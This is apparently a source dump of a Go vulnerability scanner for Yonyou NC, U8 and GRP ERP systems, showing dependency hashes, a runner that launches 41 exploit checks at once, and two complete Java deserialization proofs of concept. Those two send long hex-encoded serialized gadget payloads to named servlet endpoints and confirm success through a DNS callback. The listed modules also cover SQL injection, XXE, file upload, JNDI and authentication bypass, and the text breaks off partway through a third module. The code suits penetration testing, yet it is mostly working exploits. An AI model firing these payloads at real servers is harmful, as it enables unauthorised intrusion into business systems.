39 | github.com/quic-go/qtls-go1-20 v0.4.1 h1:D33340mCNDAIKBqXuAvexTNMUByrYmFYVfKfDN5nfFs=
40 | github.com/quic-go/qtls-go1-20 v0.4.1/go.mod h1:X9Nh97ZL80Z+bX/gUXMbipO6OxdiDi58b/fMC9mAL+k=
41 | github.com/quic-go/quic-go v0.40.0 h1:GYd1iznlKm7dpHD7pOVpUvItgMPo/jrMgDWZhMCecqw=
42 | github.com/quic-go/quic-go v0.40.0/go.mod h1:PeN7kuVJ4xZbxSv/4OX6S1USOX8MJvydwpTx31vx60c=
43 | github.com/refraction-networking/utls v1.5.4 h1:9k6EO2b8TaOGsQ7Pl7p9w6PUhx18/ZCeT0WNTZ7Uw4o=
44 | github.com/refraction-networking/utls v1.5.4/go.mod h1:SPuDbBmgLGp8s+HLNc83FuavwZCFoMmExj+ltUHiHUw=
45 | github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
46 | github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
47 | github.com/stretchr/testify v1.8.4 h1:CcVxjf3Q8PM0mHUKJCdn+eZZtm5yQwehR5yeSVQQcUk=
48 | github.com/stretchr/testify v1.8.4/go.mod h1:sz/lmYIOXD/1dqDmKjjqLyZ2RngseejIcXlSw2iwfAo=
49 | github.com/xo/terminfo v0.0.0-20210125001918-ca9a967f8778 h1:QldyIu/L63oPpyvQmHgvgickp1Yw510KJOqX7H24mg8=
50 | github.com/xo/terminfo v0.0.0-20210125001918-ca9a967f8778/go.mod h1:2MuV+tbUrU1zIOPMxZ5EncGwgmMJsa+9ucAQZXxsObs=
51 | go.uber.org/mock v0.3.0 h1:3mUxI1No2/60yUYax92Pt8eNOEecx2D3lcXZh2NEZJo=
52 | go.uber.org/mock v0.3.0/go.mod h1:a6FSlNadKUHUa9IP5Vyt1zh4fC7uAwxMutEAscFbkZc=
53 | golang.org/x/crypto v0.12.0 h1:tFM/ta59kqch6LlvYnPa0yx5a83cL2nHflFhYKvv9Yk=
54 | golang.org/x/crypto v0.12.0/go.mod h1:NF0Gs7EO5K4qLn+Ylc+fih8BSTeIjAP05siRnAh98yw=
55 | golang.org/x/exp v0.0.0-20230817173708-d852ddb80c63 h1:m64FZMko/V45gv0bNmrNYoDEq8U5YUhetc9cBWKS1TQ=
56 | golang.org/x/exp v0.0.0-20230817173708-d852ddb80c63/go.mod h1:0v4NqG35kSWCMzLaMeX+IQrlSnVE/bqGSyC2cz/9Le8=
57 | golang.org/x/mod v0.12.0 h1:rmsUpXtvNzj340zd98LZ4KntptpfRHwpFOHG188oHXc=
58 | golang.org/x/mod v0.12.0/go.mod h1:iBbtSCu2XBx23ZKBPSOrRkjjQPZFPuis4dIYUhu/chs=
59 | golang.org/x/net v0.14.0 h1:BONx9s002vGdD9umnlX1Po8vOZmrgH34qlHcD1MfK14=
60 | golang.org/x/net v0.14.0/go.mod h1:PpSgVXXLK0OxS0F31C1/tv6XNguvCrnXIDrFMspZIUI=
61 | golang.org/x/sys v0.12.0 h1:CM0HF96J0hcLAwsHPJZjfdNzs0gftsLfgKt57wWHJ0o=
62 | golang.org/x/sys v0.12.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
63 | golang.org/x/text v0.13.0 h1:ablQoSUd0tRdKxZewP80B+BaqeKJuVhuRxj/dkrun3k=
64 | golang.org/x/text v0.13.0/go.mod h1:TvPlkZtksWOMsz7fbANvkp4WM8x/WCo/om8BMLbz+aE=
65 | golang.org/x/tools v0.12.1-0.20230815132531-74c255bcf846 h1:Vve/L0v7CXXuxUmaMGIEK/dEeq7uiqb5qBgQrZzIE7E=
66 | golang.org/x/tools v0.12.1-0.20230815132531-74c255bcf846/go.mod h1:Sc0INKfu04TlqNoRA1hgpFZbhYXHPr4V5DzpSBTPqQM=
67 | google.golang.org/protobuf v1.28.0 h1:w43yiav+6bVFTBQFZX0r7ipe9JQ1QsbMgHwbBziscLw=
68 | google.golang.org/protobuf v1.28.0/go.mod h1:HV8QOd/L58Z+nl8r43ehVNZIU/HEI6OcFqwMG9pJV4I=
69 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
70 | gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
71 | gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA=
72 | gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
73 | 


--------------------------------------------------------------------------------
/pkg/config/config.go:
--------------------------------------------------------------------------------
  1 | package config
  2 | 
  3 | import (
  4 | 	"github.com/gookit/color"
  5 | 	"sync"
  6 | 	"yongyouScan/pkg/POC/ConfigurationNc"
  7 | 	ERP_NC_MLBL "yongyouScan/pkg/POC/ERP-NC-MLBL"
  8 | 	FileReceiveServlet_Deser "yongyouScan/pkg/POC/FileReceiveServlet-Deser"
  9 | 	GRP_U8_Proxy_sqljin_xxe "yongyouScan/pkg/POC/GRP-U8-Proxy-sqljin-xxe"
 10 | 	GRP_U8_U8AppProxy "yongyouScan/pkg/POC/GRP-U8-U8AppProxy"
 11 | 	GRP_U8_UploadFileData "yongyouScan/pkg/POC/GRP-U8-UploadFileData"
 12 | 	KSOA_ImageUpload "yongyouScan/pkg/POC/KSOA-ImageUpload"
 13 | 	KSOA_sqljni "yongyouScan/pkg/POC/KSOA-sqljni"
 14 | 	MessageServlet_Deser "yongyouScan/pkg/POC/MessageServlet-Deser"
 15 | 	NC_BshServlet "yongyouScan/pkg/POC/NC-BshServlet"
 16 | 	u8_MxServlet "yongyouScan/pkg/POC/NC-Cloud-MxServlet"
 17 | 	NC_JiuQiClientReqDispatch "yongyouScan/pkg/POC/NC-JiuQiClientReqDispatch"
 18 | 	NC_XbrlPersistenceServlet "yongyouScan/pkg/POC/NC-XbrlPersistenceServlet"
 19 | 	NC6_5_UploadFile "yongyouScan/pkg/POC/NC6.5-UploadFile"
 20 | 	NCCloud_FS_sqljni "yongyouScan/pkg/POC/NCCloud-FS-sqljni"
 21 | 	T_CRM_sqljni "yongyouScan/pkg/POC/T-CRM-sqljni"
 22 | 	T_DownloadProxy_catfile "yongyouScan/pkg/POC/T-DownloadProxy-catfile"
 23 | 	T_RecoverPassword "yongyouScan/pkg/POC/T-RecoverPassword"
 24 | 	T_Uploadfile "yongyouScan/pkg/POC/T-Uploadfile"
 25 | 	U8_ActionHandlerServlet "yongyouScan/pkg/POC/U8-ActionHandlerServlet"
 26 | 	U8_CacheInvokeServlet "yongyouScan/pkg/POC/U8-CacheInvokeServlet"
 27 | 	U8_ClientRequestDispatch "yongyouScan/pkg/POC/U8-ClientRequestDispatch"
 28 | 	u8_FileTransportServlet "yongyouScan/pkg/POC/U8-FileTransportServlet"
 29 | 	U8_OA_getSessionList "yongyouScan/pkg/POC/U8-OA-getSessionList"
 30 | 	U8_OA_test_sqjni "yongyouScan/pkg/POC/U8-OA-test-sqjni"
 31 | 	U8_RegisterServlet "yongyouScan/pkg/POC/U8-RegisterServlet"
 32 | 	U8_TaskTreeQuery "yongyouScan/pkg/POC/U8-TaskTreeQuery"
 33 | 	Uapjs_JNDI "yongyouScan/pkg/POC/Uapjs-JNDI"
 34 | 	UploadServlet_Deser "yongyouScan/pkg/POC/UploadServlet-Deser"
 35 | 	accept_upload "yongyouScan/pkg/POC/accept-upload"
 36 | 	files_Deser "yongyouScan/pkg/POC/files-Deser"
 37 | 	fs_dlbypass "yongyouScan/pkg/POC/fs-dlbypass"
 38 | 	fs_rzBypass "yongyouScan/pkg/POC/fs-rzBypass"
 39 | 	monitorservlet_Desera "yongyouScan/pkg/POC/monitorservlet-Desera"
 40 | 	u8_LoggingConfigServlet "yongyouScan/pkg/POC/u8-LoggingConfigServlet"
 41 | 	u8_LoginServlet "yongyouScan/pkg/POC/u8-LoginServlet"
 42 | 	u8_MonitorServlet "yongyouScan/pkg/POC/u8-MonitorServlet"
 43 | 	u8_ServletCommander "yongyouScan/pkg/POC/u8-ServletCommander"
 44 | 	u8_TableInputOperServlet "yongyouScan/pkg/POC/u8-TableInputOperServlet"
 45 | 	uapws_acessBypass "yongyouScan/pkg/POC/uapws-acessBypass"
 46 | 	uapws_wsdl_XXE "yongyouScan/pkg/POC/uapws-wsdl-XXE"
 47 | )
 48 | 
 49 | type WorkExp struct {
 50 | 	Url string
 51 | }
 52 | 
 53 | func (c *WorkExp) YonYouScanRun() {
 54 | 	// 上传写了个一半记得改改
 55 | 	// color.Blue.Println("[+] 上传的检测可能是不准确的，因为即使是未授权，在请求包中也要包含Cookie")
 56 | 	color.Blue.Println("[+] URl: " + c.Url)
 57 | 	var wg sync.WaitGroup
 58 | 	wg.Add(41)
 59 | 	go func() {
 60 | 		ERP_NC_MLBL.Run(c.Url)
 61 | 		wg.Done()
 62 | 	}()
 63 | 	go func() {
 64 | 		NC_BshServlet.Run(c.Url)
 65 | 		wg.Done()
 66 | 	}()
 67 | 	go func() {
 68 | 		NCCloud_FS_sqljni.Run(c.Url)
 69 | 		wg.Done()
 70 | 	}()
 71 | 	go func() {
 72 | 		NC6_5_UploadFile.Run(c.Url)
 73 | 		wg.Done()
 74 | 	}()
 75 | 	go func() {
 76 | 		NC_XbrlPersistenceServlet.Run(c.Url)
 77 | 		wg.Done()
 78 | 	}()
 79 | 	go func() {
 80 | 		U8_OA_getSessionList.Run(c.Url)
 81 | 		wg.Done()
 82 | 	}()
 83 | 	go func() {
 84 | 		U8_OA_test_sqjni.Run(c.Url)
 85 | 		wg.Done()
 86 | 	}()
 87 | 	go func() {
 88 | 		GRP_U8_UploadFileData.Run(c.Url)
 89 | 		wg.Done()
 90 | 	}()
 91 | 	go func() {
 92 | 		GRP_U8_Proxy_sqljin_xxe.Run(c.Url)
 93 | 		wg.Done()
 94 | 	}()
 95 | 	go func() {
 96 | 		Uapjs_JNDI.Run(c.Url)
 97 | 		wg.Done()
 98 | 	}()
 99 | 	go func() {
100 | 		T_CRM_sqljni.Run(c.Url)
101 | 		wg.Done()
102 | 	}()
103 | 	go func() {
104 | 		T_Uploadfile.Run(c.Url)
105 | 		wg.Done()
106 | 	}()
107 | 	go func() {
108 | 		T_RecoverPassword.Run(c.Url)
109 | 		wg.Done()
110 | 	}()
111 | 	go func() {
112 | 		GRP_U8_U8AppProxy.Run(c.Url)
113 | 		wg.Done()
114 | 	}()
115 | 	go func() {
116 | 		uapws_acessBypass.Run(c.Url)
117 | 		wg.Done()
118 | 	}()
119 | 	go func() {
120 | 		fs_rzBypass.Run(c.Url)
121 | 		wg.Done()
122 | 	}()
123 | 	go func() {
124 | 		fs_dlbypass.Run(c.Url)
125 | 		wg.Done()
126 | 	}()
127 | 	go func() {
128 | 		files_Deser.Run(c.Url)
129 | 		wg.Done()
130 | 	}()
131 | 	go func() {
132 | 		T_DownloadProxy_catfile.Run(c.Url)
133 | 		wg.Done()
134 | 	}()
135 | 	go func() {
136 | 		KSOA_ImageUpload.Run(c.Url)
137 | 		wg.Done()
138 | 	}()
139 | 	go func() {
140 | 		accept_upload.Run(c.Url)
141 | 		wg.Done()
142 | 	}()
143 | 	// https://github.com/wgpsec/YongYouNcTool/blob/main/src/main/java/toolPannel.java
144 | 	go func() {
145 | 		MessageServlet_Deser.Run(c.Url)
146 | 		wg.Done()
147 | 	}()
148 | 	go func() {
149 | 		UploadServlet_Deser.Run(c.Url)
150 | 		wg.Done()
151 | 	}()
152 | 	go func() {
153 | 		monitorservlet_Desera.Run(c.Url)
154 | 		wg.Done()
155 | 	}()
156 | 	go func() {
157 | 		FileReceiveServlet_Deser.Run(c.Url)
158 | 		wg.Done()
159 | 	}()
160 | 	// https://blog.csdn.net/qq_41904294/article/details/134908263
161 | 	go func() {
162 | 		u8_TableInputOperServlet.Run(c.Url)
163 | 		wg.Done()
164 | 	}()
165 | 	go func() {
166 | 		u8_LoginServlet.Run(c.Url)
167 | 		wg.Done()
168 | 	}()
169 | 	go func() {
170 | 		u8_FileTransportServlet.Run(c.Url)
171 | 		wg.Done()
172 | 	}()
173 | 	go func() {
174 | 		U8_CacheInvokeServlet.Run(c.Url)
175 | 		wg.Done()
176 | 	}()
177 | 	go func() {
178 | 		U8_ActionHandlerServlet.Run(c.Url)
179 | 		wg.Done()
180 | 	}()
181 | 	go func() {
182 | 		u8_ServletCommander.Run(c.Url)
183 | 		wg.Done()
184 | 	}()
185 | 	go func() {
186 | 		u8_MxServlet.Run(c.Url)
187 | 		wg.Done()
188 | 	}()
189 | 	go func() {
190 | 		u8_MonitorServlet.Run(c.Url)
191 | 		wg.Done()
192 | 	}()
193 | 	go func() {
194 | 		U8_ClientRequestDispatch.Run(c.Url)
195 | 		wg.Done()
196 | 	}()
197 | 	go func() {
198 | 		U8_RegisterServlet.Run(c.Url)
199 | 		wg.Done()
200 | 	}()
201 | 	go func() {
202 | 		u8_LoggingConfigServlet.Run(c.Url)
203 | 		wg.Done()
204 | 	}()
205 | 
206 | 	go func() {
207 | 		uapws_wsdl_XXE.Run(c.Url)
208 | 		wg.Done()
209 | 	}()
210 | 	go func() {
211 | 		ConfigurationNc.Run(c.Url)
212 | 		wg.Done()
213 | 	}()
214 | 	go func() {
215 | 		KSOA_sqljni.Run(c.Url)
216 | 		wg.Done()
217 | 	}()
218 | 	go func() {
219 | 		NC_JiuQiClientReqDispatch.Run(c.Url)
220 | 		wg.Done()
221 | 	}()
222 | 	go func() {
223 | 		U8_TaskTreeQuery.Run(c.Url)
224 | 		wg.Done()
225 | 	}()
226 | 	wg.Wait()
227 | }
228 | 


--------------------------------------------------------------------------------
/pkg/POC/UploadServlet-Deser/UploadServlet-Deser.go:
--------------------------------------------------------------------------------
 1 | package UploadServlet_Deser
 2 | 
 3 | import (
 4 | 	"encoding/hex"
 5 | 	"fmt"
 6 | 	"github.com/gookit/color"
 7 | 	"github.com/imroc/req/v3"
 8 | 	"time"
 9 | 	"yongyouScan/pkg/dnslog"
10 | 	"yongyouScan/pkg/utils"
11 | )
12 | 
13 | var (
14 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
15 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
16 | )
17 | 
18 | func Run(url string) {
19 | 	domain, session := dnslog.GetDnslogUrl()
20 | 	url = url + "servlet/~ic/nc.document.pub.fileSystem.servlet.UploadServlet"
21 | 	_, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
22 | 		"User-Agent": UA,
23 | 	}).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", utils.InsertBackslashX(fmt.Sprintf("ACED0005737200146A6176612E7574696C2E4C696E6B65644C6973740C29535D4A6088220300007870770400000016737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00054C0004686F737471007E00054C000870726F746F636F6C71007E00054C000372656671007E00057870FFFFFFFFFFFFFFFF740014636333316F723332312E%s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url)
24 | 	if err != nil {
25 | 		color.Red.Println("[-] 用友 NC UploadServlet反序列化漏洞不存在")
26 | 		return
27 | 	}
28 | 	if dnslog.GetDnslogRecord(session) {
29 | 		color.Green.Println("[+] 用友 NC UploadServlet反序列化漏洞存在 -> " + url)
30 | 		return
31 | 	}
32 | 	color.Red.Println("[-] 用友 NC UploadServlet反序列化漏洞不存在")
33 | }
34 | 


--------------------------------------------------------------------------------
/pkg/POC/MessageServlet-Deser/MessageServlet-Deser.go:
--------------------------------------------------------------------------------
 1 | package MessageServlet_Deser
 2 | 
 3 | import (
 4 | 	"encoding/hex"
 5 | 	"fmt"
 6 | 	"github.com/gookit/color"
 7 | 	"github.com/imroc/req/v3"
 8 | 	"time"
 9 | 	"yongyouScan/pkg/dnslog"
10 | 	"yongyouScan/pkg/utils"
11 | )
12 | 
13 | //https://blog.csdn.net/qq_41904294/article/details/134430713
14 | 
15 | var (
16 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
17 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
18 | )
19 | 
20 | func Run(url string) {
21 | 	domain, session := dnslog.GetDnslogUrl()
22 | 	url = url + "service/monitorservlet"
23 | 	_, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
24 | 		"User-Agent": UA,
25 | 	}).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", utils.InsertBackslashX(fmt.Sprintf("ACED0005737200146A6176612E7574696C2E4C696E6B65644C6973740C29535D4A6088220300007870770400000016737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00054C0004686F737471007E00054C000870726F746F636F6C71007E00054C000372656671007E00057870FFFFFFFFFFFFFFFF740014636333316F723332312E%s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url)
26 | 	if err != nil {
27 | 		color.Red.Println("[-] 用友 NC MessageServlet反序列化漏洞不存在")
28 | 		return
29 | 	}
30 | 	if dnslog.GetDnslogRecord(session) {
31 | 		color.Green.Println("[+] 用友 NC MessageServlet反序列化漏洞存在 -> " + url)
32 | 		return
33 | 	}
34 | 	color.Red.Println("[-] 用友 NC MessageServlet反序列化漏洞不存在")
35 | }
36 | 


--------------------------------------------------------------------------------
/pkg/POC/files-Deser/files-Deser.go:
--------------------------------------------------------------------------------
 1 | package files_Deser
 2 | 
 3 | import (
 4 | 	"encoding/hex"
 5 | 	"fmt"
 6 | 	"github.com/gookit/color"
 7 | 	"github.com/imroc/req/v3"
 8 | 	"time"
 9 | 	"yongyouScan/pkg/dnslog"
10 | 	"yongyouScan/pkg/utils"
11 | )
12 | 
13 | var (
14 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
15 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
16 | )
17 | 
18 | func Run(url string) {
19 | 	domain, session := dnslog.GetDnslogUrl()
20 | 	url = url + "/servlet/~baseapp/nc.file.pub.imple.FileUploadServlet"
21 | 	_, err := client.R().
